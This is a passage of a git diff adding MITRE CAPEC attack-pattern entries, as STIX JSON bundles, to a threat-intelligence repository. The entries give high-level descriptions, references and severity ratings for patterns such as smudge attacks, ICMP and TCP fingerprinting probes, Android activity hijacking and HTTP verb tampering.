"x_capec_typical_severity": "Medium", + "x_capec_version": "3.9" + } + ], + "spec_version": "2.0", + "type": "bundle" +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/capec/2.0/attack-pattern/attack-pattern--0e475610-f909-4927-a93c-04f08b1781b3.json b/cti-ATT-CK-v13.1/capec/2.0/attack-pattern/attack-pattern--0e475610-f909-4927-a93c-04f08b1781b3.json new file mode 100644 index 0000000000000000000000000000000000000000..a157ddc47f5afb37510e5dd4aef1fb8dce4a12b9 --- /dev/null 
+++ b/cti-ATT-CK-v13.1/capec/2.0/attack-pattern/attack-pattern--0e475610-f909-4927-a93c-04f08b1781b3.json @@ -0,0 +1,29 @@ +{ + "id": "bundle--9c23af26-b581-44a2-89aa-c1f7f893926d", + "objects": [ + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "This attack pattern has been deprecated as it is a duplicate of the existing attack pattern \"CAPEC-65 : Sniff Application Code\". Please refer to this other CAPEC going forward.", + "external_references": [ + { + "external_id": "CAPEC-259", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/259.html" + } + ], + "id": "attack-pattern--0e475610-f909-4927-a93c-04f08b1781b3", + "modified": "2017-08-04T00:00:00.000Z", + "name": "DEPRECATED: Passively Sniffing and Capturing Application Code Bound for an Authorized Client During Patching", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "attack-pattern", + "x_capec_abstraction": "Standard", + "x_capec_status": "Deprecated", + "x_capec_version": "3.9" + } + ], + "spec_version": "2.0", + "type": "bundle" +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/capec/2.0/attack-pattern/attack-pattern--0fda524b-2218-4aec-bf3e-6f345d13e459.json b/cti-ATT-CK-v13.1/capec/2.0/attack-pattern/attack-pattern--0fda524b-2218-4aec-bf3e-6f345d13e459.json new file mode 100644 index 0000000000000000000000000000000000000000..f3da6ead5497bb7e7c6a2e41520352062ec8c603 --- /dev/null +++ b/cti-ATT-CK-v13.1/capec/2.0/attack-pattern/attack-pattern--0fda524b-2218-4aec-bf3e-6f345d13e459.json 
@@ -0,0 +1,46 @@ +{ + "id": "bundle--4d7e6793-b3bc-4a92-96ca-fc95d834d373", + "objects": [ + { + "created": "2015-11-09T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Attacks that reveal the password/passcode pattern on a touchscreen device by detecting oil smudges left behind by the user’s fingers.", + "external_references": [ + { + "external_id": "CAPEC-626", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/626.html" + } + ], + "id": "attack-pattern--0fda524b-2218-4aec-bf3e-6f345d13e459", + "modified": "2019-09-30T00:00:00.000Z", + "name": "Smudge Attack", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "attack-pattern", + "x_capec_abstraction": "Detailed", + "x_capec_child_of_refs": [ + "attack-pattern--5e808864-44b1-478c-8cb0-75c55cd51e2b" + ], + "x_capec_consequences": { + "Access_Control": [ + "Bypass Protection Mechanism" + ] + }, + "x_capec_domains": [ + "Physical Security" + ], + "x_capec_prerequisites": [ + "The attacker must have physical access to the device." + ], + "x_capec_skills_required": { + "Medium": "The attacker must know how to make use of these smudges." + }, + "x_capec_status": "Draft", + "x_capec_version": "3.9" + } + ], + "spec_version": "2.0", + "type": "bundle" +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/capec/2.0/attack-pattern/attack-pattern--1059e91f-43ff-4a00-bc74-4110979f5247.json b/cti-ATT-CK-v13.1/capec/2.0/attack-pattern/attack-pattern--1059e91f-43ff-4a00-bc74-4110979f5247.json new file mode 100644 index 0000000000000000000000000000000000000000..9900aff56d1a86dbd68d45113d80445d305b1200 --- /dev/null +++ b/cti-ATT-CK-v13.1/capec/2.0/attack-pattern/attack-pattern--1059e91f-43ff-4a00-bc74-4110979f5247.json 
@@ -0,0 +1,87 @@ +{ + "id": "bundle--a33feb37-d5fc-4db7-b136-45158b8c7eae", + "objects": [ + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An adversary uses a technique to generate an ICMP Error message (Port Unreachable, Destination Unreachable, Redirect, Source Quench, Time Exceeded, Parameter Problem) from a target and then analyze the amount of data returned or \"Quoted\" from the originating request that generated the ICMP error message.", + "external_references": [ + { + "external_id": "CAPEC-329", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/329.html" + }, + { + "external_id": "CWE-200", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/200.html" + }, + { + "description": "Stuart McClure, Joel Scambray, George Kurtz, Hacking Exposed: Network Security Secrets & Solutions (6th Edition), 2009, McGraw Hill", + "external_id": "REF-33", + "source_name": "reference_from_CAPEC" + }, + { + "description": "J. Postel, RFC792 - Internet Control Messaging Protocol, 1981--09, Defense Advanced Research Projects Agency (DARPA)", + "external_id": "REF-123", + "source_name": "reference_from_CAPEC", + "url": "http://www.faqs.org/rfcs/rfc792.html" + }, + { + "description": "R. 
Braden, Ed., RFC1122 - Requirements for Internet Hosts - Communication Layers, 1989--10", + "external_id": "REF-124", + "source_name": "reference_from_CAPEC", + "url": "http://www.faqs.org/rfcs/rfc1122.html" + }, + { + "description": "Ofir Arkin, A Remote Active OS Fingerprinting Tool using ICMP, 2002--04, The Sys-Security Group", + "external_id": "REF-262", + "source_name": "reference_from_CAPEC", + "url": "http://ofirarkin.files.wordpress.com/2008/11/login.pdf" + } + ], + "id": "attack-pattern--1059e91f-43ff-4a00-bc74-4110979f5247", + "modified": "2022-02-22T00:00:00.000Z", + "name": "ICMP Error Message Quoting Probe", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "attack-pattern", + "x_capec_abstraction": "Detailed", + "x_capec_child_of_refs": [ + "attack-pattern--6227a1fc-7504-4a5f-b5b2-4c4f1fe38617" + ], + "x_capec_consequences": { + "Access_Control": [ + "Bypass Protection Mechanism", + "Hide Activities" + ], + "Authorization": [ + "Bypass Protection Mechanism", + "Hide Activities" + ], + "Confidentiality": [ + "Read Data", + "Bypass Protection Mechanism", + "Hide Activities" + ] + }, + "x_capec_domains": [ + "Software" + ], + "x_capec_extended_description": "\n For this purpose \"Port Unreachable\" error messages are often used, as generating them requires the adversary to send a UDP datagram to a closed port on the target. The goal of this analysis to make inferences about the type of operating system or firmware that sent the error message in reply.\n This is useful for identifying unique characteristics of operating systems because the RFC-1122 expected behavior reads: \"Every ICMP error message includes the Internet header and at least the first 8 data octets of the datagram that triggered the error; more than 8 octets MAY be sent [...].\" This contrasts with RFC-792 expected behavior, which limited the quoted text to 64 bits (8 octets). 
Given the latitude in the specification the resulting RFC-1122 stack implementations often respond with a high degree of variability in the amount of data quoted in the error message because \"older\" or \"legacy\" stacks may comply with the RFC-792 specification, while other stacks may choose a longer format in accordance with RFC-1122. As a general rule most operating systems or firmware will quote the first 8 bytes of the datagram triggering the error, but some IP stacks will quote more than the first 8 bytes of data.\n ", + "x_capec_likelihood_of_attack": "Medium", + "x_capec_prerequisites": [ + "The ability to monitor and interact with network communications.Access to at least one host, and the privileges to interface with the network interface card." + ], + "x_capec_resources_required": [ + "A tool capable of sending/receiving UDP datagram packets from a remote system to a closed port and receive an ICMP Error Message Type 3, \"Port Unreachable.." + ], + "x_capec_status": "Stable", + "x_capec_typical_severity": "Low", + "x_capec_version": "3.9" + } + ], + "spec_version": "2.0", + "type": "bundle" +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/capec/2.0/attack-pattern/attack-pattern--10ce28bf-9f93-4a45-a39e-6407141a34d4.json b/cti-ATT-CK-v13.1/capec/2.0/attack-pattern/attack-pattern--10ce28bf-9f93-4a45-a39e-6407141a34d4.json new file mode 100644 index 0000000000000000000000000000000000000000..9abc029d5b0138f8899d3d8acdca927a160ffdc2 --- /dev/null +++ b/cti-ATT-CK-v13.1/capec/2.0/attack-pattern/attack-pattern--10ce28bf-9f93-4a45-a39e-6407141a34d4.json 
@@ -0,0 +1,64 @@ +{ + "id": "bundle--d630fe85-698a-4959-8ba0-64319c6b597c", + "objects": [ + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An adversary intercepts an implicit intent sent to launch a Android-based trusted activity and instead launches a counterfeit activity in its place. The malicious activity is then used to mimic the trusted activity's user interface and prompt the target to enter sensitive data as if they were interacting with the trusted activity.", + "external_references": [ + { + "external_id": "CAPEC-501", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/501.html" + }, + { + "external_id": "CWE-923", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/923.html" + }, + { + "description": "Erika Chin, Adrienne Porter Felt, Kate Greenwood, David Wagner, Analyzing Inter-Application Communication in Android, 2011, International Conference on Mobile Systems, Applications, and Services (MobiSys)", + "external_id": "REF-427", + "source_name": "reference_from_CAPEC", + "url": "https://people.eecs.berkeley.edu/~daw/papers/intents-mobisys11.pdf" + } + ], + "id": "attack-pattern--10ce28bf-9f93-4a45-a39e-6407141a34d4", + "modified": "2021-10-21T00:00:00.000Z", + "name": "Android Activity Hijack", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "attack-pattern", + "x_capec_abstraction": "Detailed", + "x_capec_child_of_refs": [ + "attack-pattern--48f21dcd-2490-49c6-9690-1cb586b201f4", + "attack-pattern--fc3a9a6f-66c9-4363-8ebd-9bd18725fff8" + ], + "x_capec_consequences": { + "Confidentiality": [ + "Read Data" + ] + }, + "x_capec_domains": [ + "Software", + "Software" + ], + "x_capec_execution_flow": "

Execution Flow

Explore

  1. Find an android application that uses implicit intents: Since this attack only works on android applications that use implicit intents, rather than explicit intents, an adversary must first identify an app that uses implicit intents to launch an Android-based trusted activity, and what that activity is.

Experiment

  1. Create a malicious app: The adversary must create a malicious android app meant to intercept implicit intents to launch an Adroid-based trusted activity. This malicious app will mimic the trusted activiy's user interface to get the user to enter sensitive data.

  2. Techniques
    Specify the type of intent wished to be intercepted in the malicious app's manifest file using an intent filter
  3. Get user to download malicious app: The adversary must get a user using the targeted app to download the malicious app by any means necessary

Exploit

  1. Gather sensitive data through malicious app: Once the target application sends an implicit intent to launch a trusted activity, the malicious app will be launched instead that looks identical to the interface of that activity. When the user enters sensitive information it will be captured by the malicious app.

  2. Techniques
    Gather login information from a user using a malicious app
", + "x_capec_prerequisites": [ + "The adversary must have previously installed the malicious application onto the Android device that will run in place of the trusted activity." + ], + "x_capec_resources_required": [ + "Malware capable of acting on the adversary's objectives." + ], + "x_capec_skills_required": { + "High": "The adversary must typically overcome network and host defenses in order to place malware on the system." + }, + "x_capec_status": "Draft", + "x_capec_typical_severity": "Medium", + "x_capec_version": "3.9" + } + ], + "spec_version": "2.0", + "type": "bundle" +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/capec/2.0/attack-pattern/attack-pattern--11d7e0d6-5655-4fc7-aee8-e2e0fc6c5088.json b/cti-ATT-CK-v13.1/capec/2.0/attack-pattern/attack-pattern--11d7e0d6-5655-4fc7-aee8-e2e0fc6c5088.json new file mode 100644 index 0000000000000000000000000000000000000000..0dad861ad2f998d2a6b5e324991bdda6931de82e --- /dev/null +++ b/cti-ATT-CK-v13.1/capec/2.0/attack-pattern/attack-pattern--11d7e0d6-5655-4fc7-aee8-e2e0fc6c5088.json 
@@ -0,0 +1,53 @@
+{
+ "id": "bundle--0a006e5e-ce77-4270-a01c-eafbfe068116",
+ "objects": [
+ {
+ "created": "2015-11-09T00:00:00.000Z",
+ "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd",
+ "description": "In this attack scenario, the attacker passively listens for WiFi management frame messages containing the Service Set Identifier (SSID) for the WiFi network. These messages are frequently transmitted by WiFi access points (e.g., the retransmission device) as well as by clients that are accessing the network (e.g., the handset/mobile device). Once the attacker is able to associate an SSID with a particular user or set of users (for example, when attending a public event), the attacker can then scan for this SSID to track that user in the future.",
+ "external_references": [
+ {
+ "external_id": "CAPEC-613",
+ "source_name": "capec",
+ "url": "https://capec.mitre.org/data/definitions/613.html"
+ },
+ {
+ "external_id": "CWE-201",
+ "source_name": "cwe",
+ "url": "http://cwe.mitre.org/data/definitions/201.html"
+ },
+ {
+ "external_id": "CWE-300",
+ "source_name": "cwe",
+ "url": "http://cwe.mitre.org/data/definitions/300.html"
+ }
+ ],
+ "id": "attack-pattern--11d7e0d6-5655-4fc7-aee8-e2e0fc6c5088",
+ "modified": "2019-09-30T00:00:00.000Z",
+ "name": "WiFi SSID Tracking",
+ "object_marking_refs": [
+ "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d"
+ ],
+ "type": "attack-pattern",
+ "x_capec_abstraction": "Detailed",
+ "x_capec_child_of_refs": [
+ "attack-pattern--d780db94-413f-402d-a4d9-cf179b316c8c"
+ ],
+ "x_capec_domains": [
+ "Communications",
+ "Software"
+ ],
+ "x_capec_prerequisites": [
+ "None"
+ ],
+ "x_capec_skills_required": {
+ "Low": "Open source and commercial software tools are available and open databases of known WiFi SSID addresses are available online."
+ },
+ "x_capec_status": "Draft",
+ "x_capec_typical_severity": "Low",
+ "x_capec_version": "3.9"
+ }
+ ],
+ "spec_version": "2.0",
+ "type": "bundle"
+}
\ No newline at end of file
diff --git a/cti-ATT-CK-v13.1/capec/2.0/attack-pattern/attack-pattern--123b3182-a540-4b15-ac28-0fbf607f9ebf.json b/cti-ATT-CK-v13.1/capec/2.0/attack-pattern/attack-pattern--123b3182-a540-4b15-ac28-0fbf607f9ebf.json
new file mode 100644
index 0000000000000000000000000000000000000000..52da429b5e9a11718ffe004c84be20c8b728701b
--- /dev/null
+++ b/cti-ATT-CK-v13.1/capec/2.0/attack-pattern/attack-pattern--123b3182-a540-4b15-ac28-0fbf607f9ebf.json
@@ -0,0 +1,29 @@
+{
+ "id": "bundle--2ad6b4ba-4549-4dd2-bc9b-b9f4c3c567c4",
+ "objects": [
+ {
+ "created": "2014-06-23T00:00:00.000Z",
+ "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd",
+ "description": "This attack pattern has been deprecated as it was deemed not to be a legitimate attack pattern.",
+ "external_references": [
+ {
+ "external_id": "CAPEC-257",
+ "source_name": "capec",
+ "url": "https://capec.mitre.org/data/definitions/257.html"
+ }
+ ],
+ "id": "attack-pattern--123b3182-a540-4b15-ac28-0fbf607f9ebf",
+ "modified": "2018-07-31T00:00:00.000Z",
+ "name": "DEPRECATED: Abuse of Transaction Data Structure",
+ "object_marking_refs": [
+ "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d"
+ ],
+ "type": "attack-pattern",
+ "x_capec_abstraction": "Meta",
+ "x_capec_status": "Deprecated",
+ "x_capec_version": "3.9"
+ }
+ ],
+ "spec_version": "2.0",
+ "type": "bundle"
+}
\ No newline at end of file
diff --git a/cti-ATT-CK-v13.1/capec/2.0/attack-pattern/attack-pattern--12d80b47-8e4c-4646-bcc3-2bd7059a44e1.json b/cti-ATT-CK-v13.1/capec/2.0/attack-pattern/attack-pattern--12d80b47-8e4c-4646-bcc3-2bd7059a44e1.json
new file mode 100644
index 0000000000000000000000000000000000000000..8732aff576e9265e43af544a27f17d200e401639
--- /dev/null
+++ b/cti-ATT-CK-v13.1/capec/2.0/attack-pattern/attack-pattern--12d80b47-8e4c-4646-bcc3-2bd7059a44e1.json 
@@ -0,0 +1,85 @@ +{ + "id": "bundle--a3bf3520-5f52-4328-971d-a978a4de3dc0", + "objects": [ + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "This type of operating system probe attempts to determine an estimate for how predictable the sequence number generation algorithm is for a remote host. Statistical techniques, such as standard deviation, can be used to determine how predictable the sequence number generation is for a system. This result can then be compared to a database of operating system behaviors to determine a likely match for operating system and version.", + "external_references": [ + { + "external_id": "CAPEC-324", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/324.html" + }, + { + "external_id": "CWE-200", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/200.html" + }, + { + "description": "Stuart McClure, Joel Scambray, George Kurtz, Hacking Exposed: Network Security Secrets & Solutions (6th Edition), 2009, McGraw Hill", + "external_id": "REF-33", + "source_name": "reference_from_CAPEC" + }, + { + "description": "Defense Advanced Research Projects Agency Information Processing Techniques Office, Information Sciences Institute University of Southern California, RFC793 - Transmission Control Protocol, 1981--09, Defense Advanced Research Projects Agency (DARPA)", + "external_id": "REF-128", + "source_name": "reference_from_CAPEC", + "url": "http://www.faqs.org/rfcs/rfc793.html" + }, + { + "description": "Gordon \"Fyodor\" Lyon, Nmap Network Scanning: The Official Nmap Project Guide to Network Discovery and Security Scanning (3rd \"Zero Day\" Edition,), 2008, Insecure.com LLC", + "external_id": "REF-212", + "source_name": "reference_from_CAPEC" + }, + { + "description": "Gordon \"Fyodor\" Lyon, The Art of Port Scanning (Volume: 7, Issue. 
51), Phrack Magazine, 1997", + "external_id": "REF-130", + "source_name": "reference_from_CAPEC", + "url": "http://phrack.org/issues/51/11.html" + } + ], + "id": "attack-pattern--12d80b47-8e4c-4646-bcc3-2bd7059a44e1", + "modified": "2018-07-31T00:00:00.000Z", + "name": "TCP (ISN) Sequence Predictability Probe", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "attack-pattern", + "x_capec_abstraction": "Detailed", + "x_capec_child_of_refs": [ + "attack-pattern--6227a1fc-7504-4a5f-b5b2-4c4f1fe38617" + ], + "x_capec_consequences": { + "Access_Control": [ + "Bypass Protection Mechanism", + "Hide Activities" + ], + "Authorization": [ + "Bypass Protection Mechanism", + "Hide Activities" + ], + "Confidentiality": [ + "Read Data", + "Bypass Protection Mechanism", + "Hide Activities" + ] + }, + "x_capec_domains": [ + "Software" + ], + "x_capec_likelihood_of_attack": "Medium", + "x_capec_prerequisites": [ + "The ability to monitor and interact with network communications.Access to at least one host, and the privileges to interface with the network interface card." + ], + "x_capec_resources_required": [ + "A tool capable of sending and receiving packets from a remote system." + ], + "x_capec_status": "Stable", + "x_capec_typical_severity": "Low", + "x_capec_version": "3.9" + } + ], + "spec_version": "2.0", + "type": "bundle" +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/capec/2.0/attack-pattern/attack-pattern--12de9227-495b-49b2-859f-334a20197ba3.json b/cti-ATT-CK-v13.1/capec/2.0/attack-pattern/attack-pattern--12de9227-495b-49b2-859f-334a20197ba3.json new file mode 100644 index 0000000000000000000000000000000000000000..d23188cdcc1cfd88e55e26ec81fff4a46af6cea8 --- /dev/null +++ b/cti-ATT-CK-v13.1/capec/2.0/attack-pattern/attack-pattern--12de9227-495b-49b2-859f-334a20197ba3.json 
@@ -0,0 +1,59 @@
+{
+ "id": "bundle--bd4bd57c-622a-4776-8dee-6cf204fcd9de",
+ "objects": [
+ {
+ "created": "2014-06-23T00:00:00.000Z",
+ "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd",
+ "description": "An adversary exploits weaknesses in input validation by manipulating resource identifiers enabling the unintended modification or specification of a resource.",
+ "external_references": [
+ {
+ "external_id": "CAPEC-240",
+ "source_name": "capec",
+ "url": "https://capec.mitre.org/data/definitions/240.html"
+ },
+ {
+ "external_id": "CWE-99",
+ "source_name": "cwe",
+ "url": "http://cwe.mitre.org/data/definitions/99.html"
+ },
+ {
+ "description": "Resource Injection",
+ "source_name": "OWASP Attacks",
+ "url": "https://owasp.org/www-community/attacks/Resource_Injection"
+ }
+ ],
+ "id": "attack-pattern--12de9227-495b-49b2-859f-334a20197ba3",
+ "modified": "2020-12-17T00:00:00.000Z",
+ "name": "Resource Injection",
+ "object_marking_refs": [
+ "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d"
+ ],
+ "type": "attack-pattern",
+ "x_capec_abstraction": "Meta",
+ "x_capec_consequences": {
+ "Confidentiality": [
+ "Read Data"
+ ],
+ "Integrity": [
+ "Modify Data"
+ ]
+ },
+ "x_capec_domains": [
+ "Communications",
+ "Software"
+ ],
+ "x_capec_likelihood_of_attack": "High",
+ "x_capec_parent_of_refs": [
+ "attack-pattern--b5cd5231-d7ef-4366-b713-a44d3f1134b4"
+ ],
+ "x_capec_prerequisites": [
+ "The target application allows the user to both specify the identifier used to access a system resource. Through this permission, the user gains the capability to perform actions on that resource (e.g., overwrite the file)"
+ ],
+ "x_capec_status": "Stable",
+ "x_capec_typical_severity": "High",
+ "x_capec_version": "3.9"
+ }
+ ],
+ "spec_version": "2.0",
+ "type": "bundle"
+}
\ No newline at end of file
diff --git a/cti-ATT-CK-v13.1/capec/2.0/attack-pattern/attack-pattern--1339dbbe-fe41-467a-b43c-7d56d22a9fe4.json b/cti-ATT-CK-v13.1/capec/2.0/attack-pattern/attack-pattern--1339dbbe-fe41-467a-b43c-7d56d22a9fe4.json new file mode 100644 index 0000000000000000000000000000000000000000..fba27de54e0dc3e25769b0b3122cef916bbff565 --- /dev/null +++ b/cti-ATT-CK-v13.1/capec/2.0/attack-pattern/attack-pattern--1339dbbe-fe41-467a-b43c-7d56d22a9fe4.json 
@@ -0,0 +1,65 @@ +{ + "id": "bundle--f5965262-a64c-465b-8d62-96b3d3ad1008", + "objects": [ + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An attacker modifies a technology, product, or component during a stage in its manufacture for the purpose of carrying out an attack against some entity involved in the supply chain lifecycle. There are an almost limitless number of ways an attacker can modify a technology when they are involved in its manufacture, as the attacker has potential inroads to the software composition, hardware design and assembly, firmware, or basic design mechanics. Additionally, manufacturing of key components is often outsourced with the final product assembled by the primary manufacturer. The greatest risk, however, is deliberate manipulation of design specifications to produce malicious hardware or devices. There are billions of transistors in a single integrated circuit and studies have shown that fewer than 10 transistors are required to create malicious functionality.", + "external_references": [ + { + "external_id": "CAPEC-438", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/438.html" + }, + { + "description": "Supply Chain Compromise", + "external_id": "T1195", + "source_name": "ATTACK", + "url": "https://attack.mitre.org/wiki/Technique/T1195" + }, + { + "description": "Jon Boyens, Angela Smith, Nadya Bartol, Kris Winkler, Alex Holbrook, Matthew Fallon, Cybersecurity Supply Chain Risk Management Practices for Systems and Organizations (2nd Draft), 2021--10---28, National Institute of Standards and Technology (NIST)", + "external_id": "REF-379", + "source_name": "reference_from_CAPEC", + "url": "https://nvlpubs.nist.gov/nistpubs/SpecialPublications/NIST.SP.800-161r1-draft2.pdf" + }, + { + "description": "Marcus Sachs, Supply Chain Attacks: Can We Secure Information Technology Supply Chain in the Age of Globalization, Verizon, 
Inc.", + "external_id": "REF-380", + "source_name": "reference_from_CAPEC" + }, + { + "description": "Thea Reilkoff, Hardware Trojans: A Novel Attack Meets a New Defense, 2010, Yale School of Engineering and Applied Science", + "external_id": "REF-381", + "source_name": "reference_from_CAPEC" + }, + { + "description": "Marianne Swanson, Nadya Bartol, Rama Moorthy, Piloting Supply Chain Risk Management Practices for Federal Information Systems (Draft NISTIR 7622), 2010, National Institute of Standards and Technology", + "external_id": "REF-382", + "source_name": "reference_from_CAPEC" + } + ], + "id": "attack-pattern--1339dbbe-fe41-467a-b43c-7d56d22a9fe4", + "modified": "2021-06-24T00:00:00.000Z", + "name": "Modification During Manufacture", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "attack-pattern", + "x_capec_abstraction": "Meta", + "x_capec_domains": [ + "Supply Chain", + "Software", + "Hardware" + ], + "x_capec_parent_of_refs": [ + "attack-pattern--efb74200-657d-438c-aaff-bbd9644dd72d", + "attack-pattern--cf550376-63ac-4b46-87d1-0e324c1c1c46" + ], + "x_capec_status": "Draft", + "x_capec_version": "3.9" + } + ], + "spec_version": "2.0", + "type": "bundle" +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/capec/2.0/attack-pattern/attack-pattern--13b94aaa-9c95-487c-ad68-8c29d8ac0068.json b/cti-ATT-CK-v13.1/capec/2.0/attack-pattern/attack-pattern--13b94aaa-9c95-487c-ad68-8c29d8ac0068.json new file mode 100644 index 0000000000000000000000000000000000000000..e612486d948d71d89287a27375eca9bc34cbabe0 --- /dev/null +++ b/cti-ATT-CK-v13.1/capec/2.0/attack-pattern/attack-pattern--13b94aaa-9c95-487c-ad68-8c29d8ac0068.json 
@@ -0,0 +1,53 @@ +{ + "id": "bundle--5689cc74-34df-4969-a05e-a8873b3fbae5", + "objects": [ + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An adversary installs or adds malicious logic (also known as malware) into a seemingly benign component of a fielded system. This logic is often hidden from the user of the system and works behind the scenes to achieve negative impacts. With the proliferation of mass digital storage and inexpensive multimedia devices, Bluetooth and 802.11 support, new attack vectors for spreading malware are emerging for things we once thought of as innocuous greeting cards, picture frames, or digital projectors. This pattern of attack focuses on systems already fielded and used in operation as opposed to systems and their components that are still under development and part of the supply chain.", + "external_references": [ + { + "external_id": "CAPEC-441", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/441.html" + }, + { + "external_id": "CWE-284", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/284.html" + } + ], + "id": "attack-pattern--13b94aaa-9c95-487c-ad68-8c29d8ac0068", + "modified": "2018-07-31T00:00:00.000Z", + "name": "Malicious Logic Insertion", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "attack-pattern", + "x_capec_abstraction": "Meta", + "x_capec_consequences": { + "Authorization": [ + "Execute Unauthorized Commands" + ] + }, + "x_capec_domains": [ + "Software", + "Hardware" + ], + "x_capec_likelihood_of_attack": "Medium", + "x_capec_parent_of_refs": [ + "attack-pattern--66112136-aa17-4300-aef8-d7a42ebc6e38", + "attack-pattern--4cfba0b3-4740-49ae-bbb4-2dad27886239", + "attack-pattern--dc05cb9b-00ae-4fd0-8743-b1fb507ea1d3" + ], + "x_capec_prerequisites": [ + "Access to the component currently deployed at a victim location." 
+ ], + "x_capec_status": "Stable", + "x_capec_typical_severity": "High", + "x_capec_version": "3.9" + } + ], + "spec_version": "2.0", + "type": "bundle" +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/capec/2.0/attack-pattern/attack-pattern--13d1d169-0023-41e2-952f-7d794844733b.json b/cti-ATT-CK-v13.1/capec/2.0/attack-pattern/attack-pattern--13d1d169-0023-41e2-952f-7d794844733b.json new file mode 100644 index 0000000000000000000000000000000000000000..4fbe3d59a05c913e5ae1c04258253cc4ce99ec56 --- /dev/null +++ b/cti-ATT-CK-v13.1/capec/2.0/attack-pattern/attack-pattern--13d1d169-0023-41e2-952f-7d794844733b.json 
@@ -0,0 +1,58 @@ +{ + "id": "bundle--99c9f361-5e1c-43cb-a352-53633f050e9b", + "objects": [ + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An attacker modifies the HTTP Verb (e.g. GET, PUT, TRACE, etc.) in order to bypass access restrictions. Some web environments allow administrators to restrict access based on the HTTP Verb used with requests. However, attackers can often provide a different HTTP Verb, or even provide a random string as a verb in order to bypass these protections. This allows the attacker to access data that should otherwise be protected.", + "external_references": [ + { + "external_id": "CAPEC-274", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/274.html" + }, + { + "external_id": "CWE-302", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/302.html" + }, + { + "external_id": "CWE-654", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/654.html" + }, + { + "description": "Arshan Dabirsiaghi, Bypassing Web Authentication and Authorization with HTTP Verb Tampering: How to inadvertently allow attackers full access to your web application, Aspect Security", + "external_id": "REF-118", + "source_name": "reference_from_CAPEC", + "url": "http://mirror.transact.net.au/sourceforge/w/project/wa/waspap/waspap/Core/Bypassing_VBAAC_with_HTTP_Verb_Tampering.pdf" + } + ], + "id": "attack-pattern--13d1d169-0023-41e2-952f-7d794844733b", + "modified": "2019-09-30T00:00:00.000Z", + "name": "HTTP Verb Tampering", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "attack-pattern", + "x_capec_abstraction": "Detailed", + "x_capec_child_of_refs": [ + "attack-pattern--9c983530-1927-43ca-addd-63d149cda4a7" + ], + "x_capec_domains": [ + "Software" + ], + "x_capec_prerequisites": [ + "The targeted system must attempt to filter access based on the HTTP verb used in 
